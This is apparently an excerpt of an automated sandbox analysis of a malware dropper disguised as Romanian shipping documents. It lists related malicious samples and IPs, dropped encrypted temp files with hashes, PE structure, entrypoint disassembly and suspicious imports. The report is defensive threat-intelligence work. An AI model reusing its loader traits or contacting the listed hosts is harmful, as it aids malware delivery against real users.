                                              42ZjBoAnX1.rtfGet hashmaliciousFormBookBrowse
                                              • 103.161.133.121
                                              https://zohoinvoicepay.com/invoice/horizonhivesholdings/secure?CInvoiceID=2-5d1a6e6e7fc02c6aa9c16ba084eaf7b11969e250db6bf56b3ff921885bb1a02a1de112985005752c6b386aa74f5531aa4b7fa92bbb84e57e4955efe41be6b38898e1fb71080bbb7a%20Get hashmaliciousUnknownBrowse
                                              • 103.163.152.75
                                              AMAZON-02USD8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 3.64.163.50
                                              VAdlEMbrmJ.elfGet hashmaliciousUnknownBrowse
                                              • 34.249.145.219
                                              Z4mLZDVZY3.elfGet hashmaliciousUnknownBrowse
                                              • 54.171.230.55
                                              iGs5wjZOhO.elfGet hashmaliciousUnknownBrowse
                                              • 54.247.62.1
                                              d92eGGZPEg.elfGet hashmaliciousGafgytBrowse
                                              • 54.217.10.153
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              Injector.exeGet hashmaliciousZTratBrowse
                                              • 18.158.58.205
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\-Dbo613

                                              Download File
                                              Process:C:\Windows\SysWOW64\certutil.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:modified
                                              Size (bytes):196608
                                              Entropy (8bit):1.1215420383712111
                                              Encrypted:false
                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\autD782.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):272384
                                              Entropy (8bit):7.993900264495581
                                              Encrypted:true
                                              SSDEEP:6144:/7m5oF4FRityDVEHnRAns0bUFgRTHKHYOT8eLglULIkGl:/ahcQVEHnyQ0HKHPTFklULTG
                                              MD5:4BC1F7CBF66CD91F18B9405E5B217355
                                              SHA1:4E9040AD4F639DE22224589034A6AEAFF1CE20C1
                                              SHA-256:A5FB4961B6C49E521C69BDE30E015E48D4F7012EFE0196C93533D9A96C0AE6D9
                                              SHA-512:41E0687D344C1F87973575BC70AB6FC6BBF20E92755A42E1AB1F4878C310C806069109ED76085B818303834289C52B9B4937F9A70FC8071E45CE1CF49C231486
                                              Malicious:false
                                              Reputation:low
                                              Preview:z.vb.L8N5i..=.....X[...x08...N513A4AJ792AXXI67P30SL8N513A4A.792OG.G6.Y...Mt..e[(Ga:EVU395iUV>]_'lZ+.CF/.($.}}.x5&RR~>=Yh8N513A48K>..!?.tVP..P4."...!S.P...}8?.,....3+..\R[|T&.792AXXI6g.30.M9N.xz 4AJ792AX.I46[2;SL.J513A4AJ79rTXXI&7P3.WL8Nu13Q4AJ592GXXI67P36SL8N513A.EJ7;2AXXI65Ps.SL(N5!3A4AZ79"AXXI67@30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792o,=1B7P34GH8N%13A"EJ7)2AXXI67P30SL8N.13!4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513

                                              C:\Users\user\AppData\Local\Temp\autD7D1.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9810
                                              Entropy (8bit):7.622262175324475
                                              Encrypted:false
                                              SSDEEP:192:VfyKYff6Bvw6GzUTBpqjQTqxGMgyjcxBg2pF6/ArYiov:lyPXQZQQT3ecxa2p6Arcv
                                              MD5:D995205A5E7B8C003CB4235F0495DEF3
                                              SHA1:E4DCE1AE5D00441514560FBA070B093BF5ECACC8
                                              SHA-256:0752F6537BA15B50ECDC870328500596B54AE2E15A621B1ACE77999DCDD40535
                                              SHA-512:01CDAA9700C54D30D24CB24FAB19CA3DA64EDB71B8DC13F07843B465A6927A516E9649B0CA24101A6E3B276F3F3EFB671E5E3147284A003328740D5472447584
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06..t...f.i..d...K%.c3....i..qc...`...c7..gSY..kc.M...]....)...K........|. .o..c.M......9.M...:...S@...l.....3.Z..m:..6.P.o.n..Y......g.:.M&.@..Y....N.l.Y.........:.Mf....r.'3i...c ....Ab.H..... .F.3<..Y..6...,.b....`...x..l....Bt.....X..0.M.....p...Yf`5_..j....f.5_..r.U..l@5_....U..l.5_..b.U..`5\..>3 ..M.^.b.Z..m7.z..q7......@.....S...G../Z...@.....jt....p.u....$.p./.q9...g.G_T......,.>_.......zm6....y....S0...................`.M..`... ...d...@..0.'.5...{>K...c..sP..X..._..r......>K.#G.c..3|vI..G.5..&`8_..md..i|vI....d.h.,. ......%..8...[=....&.@;..9...@.L..6y..f..+ .ffV9...7..l....f. .E...Y....3.Y.............vY.....@.....2p....<d....,vd.........!+ .'&@....,fq3.Yl.9.......r.3.X...c3{,.gg.Y.!...Gf`....,f.:.Nl.. .#8.....c.@........r.h.s.....,vh......t.....40.....f.....fS....4..@.6.-..p..S.5..3...S@.N..;6.`..:..l....m9.....c.`..Y.S.wx.....vn......`.E.....@y6....p.c3.-..5..b.!....F ....B5d..'S........vp......f6K-.t...B3`...@.;9.X...b.....(........g ...L..{4..d...

                                              C:\Users\user\AppData\Local\Temp\ectosphere

                                              Download File
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:ASCII text, with very long lines (29698), with no line terminators
                                              Category:modified
                                              Size (bytes):29698
                                              Entropy (8bit):3.538058660985739
                                              Encrypted:false
                                              SSDEEP:384:rYzxrp0zUaIPEtmLXDXCFldqpeRYT3509:rYz7DaIPEtEDXCIpr509
                                              MD5:1890D198BDAD5A43481314032F348DCA
                                              SHA1:34FD404F24C82A88E82BC082F6144166F29ACBF7
                                              SHA-256:45DBBB23FF1C7688CD724E4CD8FF7126A6B3AEE215CD78F43FE0888319DDDEB0
                                              SHA-512:4FF356C5E5B9F4C5768B2756BC3943A2A6D137FF4336448B0E7D9525CAE854DD6A2138FF312F1E2FD009C43BD413610E63517366E27B101A8D24099355E4A7C4
                                              Malicious:false
                                              Reputation:low
                                              Preview:1y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111779:66b1c979

                                              C:\Users\user\AppData\Local\Temp\polygamodioecious

                                              Download File
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):272384
                                              Entropy (8bit):7.993900264495581
                                              Encrypted:true
                                              SSDEEP:6144:/7m5oF4FRityDVEHnRAns0bUFgRTHKHYOT8eLglULIkGl:/ahcQVEHnyQ0HKHPTFklULTG
                                              MD5:4BC1F7CBF66CD91F18B9405E5B217355
                                              SHA1:4E9040AD4F639DE22224589034A6AEAFF1CE20C1
                                              SHA-256:A5FB4961B6C49E521C69BDE30E015E48D4F7012EFE0196C93533D9A96C0AE6D9
                                              SHA-512:41E0687D344C1F87973575BC70AB6FC6BBF20E92755A42E1AB1F4878C310C806069109ED76085B818303834289C52B9B4937F9A70FC8071E45CE1CF49C231486
                                              Malicious:false
                                              Reputation:low
                                              Preview:z.vb.L8N5i..=.....X[...x08...N513A4AJ792AXXI67P30SL8N513A4A.792OG.G6.Y...Mt..e[(Ga:EVU395iUV>]_'lZ+.CF/.($.}}.x5&RR~>=Yh8N513A48K>..!?.tVP..P4."...!S.P...}8?.,....3+..\R[|T&.792AXXI6g.30.M9N.xz 4AJ792AX.I46[2;SL.J513A4AJ79rTXXI&7P3.WL8Nu13Q4AJ592GXXI67P36SL8N513A.EJ7;2AXXI65Ps.SL(N5!3A4AZ79"AXXI67@30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792o,=1B7P34GH8N%13A"EJ7)2AXXI67P30SL8N.13!4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.120625017765173
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Documente de expediere.exe
                                              File size:1'168'384 bytes
                                              MD5:3ed2eca087936d7ab479ce62c50a9f2a
                                              SHA1:0616bdb97bf793a387359ca33a089b328d131519
                                              SHA256:42b9ac8b067460277e68574662bc607f84664a9c622608dec68e62e608dc9444
                                              SHA512:4db4416ba7200dd2a0e41db4c7990fbaa56627cb4b97bb3c4bedcc56d4948024be035e05230f56edddb6e44d107bde930ed64684052d48e9ccc3844944e112b8
                                              SSDEEP:24576:nAHnh+eWsN3skA4RV1Hom2KXMmHaxPzmOExj//NluSsbD5:ah+ZkldoPK8Yax4rNlvG
                                              TLSH:EC45AD0273D2C036FFABA2739B6AF64556BD78254123852F13981D79BD701B2233E663
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                              File Icon

                                              Icon Hash:aaf3e3e3938382a0

                                              Static PE Info

                                              General

                                              Entrypoint:0x42800a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66947F3D [Mon Jul 15 01:45:33 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:afcdf79be1557326c854b6e20cb900a7

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F3B608341EDh
                                              jmp 00007F3B60826FA4h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push edi
                                              push esi
                                              mov esi, dword ptr [esp+10h]
                                              mov ecx, dword ptr [esp+14h]
                                              mov edi, dword ptr [esp+0Ch]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F3B6082712Ah
                                              cmp edi, eax
                                              jc 00007F3B6082748Eh
                                              bt dword ptr [004C41FCh], 01h
                                              jnc 00007F3B60827129h
                                              rep movsb
                                              jmp 00007F3B6082743Ch
                                              cmp ecx, 00000080h
                                              jc 00007F3B608272F4h
                                              mov eax, edi
                                              xor eax, esi
                                              test eax, 0000000Fh
                                              jne 00007F3B60827130h
                                              bt dword ptr [004BF324h], 01h
                                              jc 00007F3B60827600h
                                              bt dword ptr [004C41FCh], 00000000h
                                              jnc 00007F3B608272CDh
                                              test edi, 00000003h
                                              jne 00007F3B608272DEh
                                              test esi, 00000003h
                                              jne 00007F3B608272BDh
                                              bt edi, 02h
                                              jnc 00007F3B6082712Fh
                                              mov eax, dword ptr [esi]
                                              sub ecx, 04h
                                              lea esi, dword ptr [esi+04h]
                                              mov dword ptr [edi], eax
                                              lea edi, dword ptr [edi+04h]
                                              bt edi, 03h
                                              jnc 00007F3B60827133h
                                              movq xmm1, qword ptr [esi]
                                              sub ecx, 08h
                                              lea esi, dword ptr [esi+08h]
                                              movq qword ptr [edi], xmm1
                                              lea edi, dword ptr [edi+08h]
                                              test esi, 00000007h
                                              je 00007F3B60827185h
                                              bt esi, 03h

                                              Rich Headers

                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x52d84.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11b0000x7134.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xc80000x52d840x52e00da05bf5d14c02c30eab94f8aa935ab87False0.9232183257918553data7.885270801575352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x11b0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                              RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                              RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                              RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                              RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                              RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                              RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                              RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                              RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                                              RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                                              RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                                              RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                                              RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                              RT_RCDATA0xd04100x4a41cdata1.0003320664395903
                                              RT_GROUP_ICON0x11a82c0x76dataEnglishGreat Britain0.6610169491525424
                                              RT_GROUP_ICON0x11a8a40x14dataEnglishGreat Britain1.15
                                              RT_VERSION0x11a8b80xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x11a9940x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                              Imports

                                              DLLImport
                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
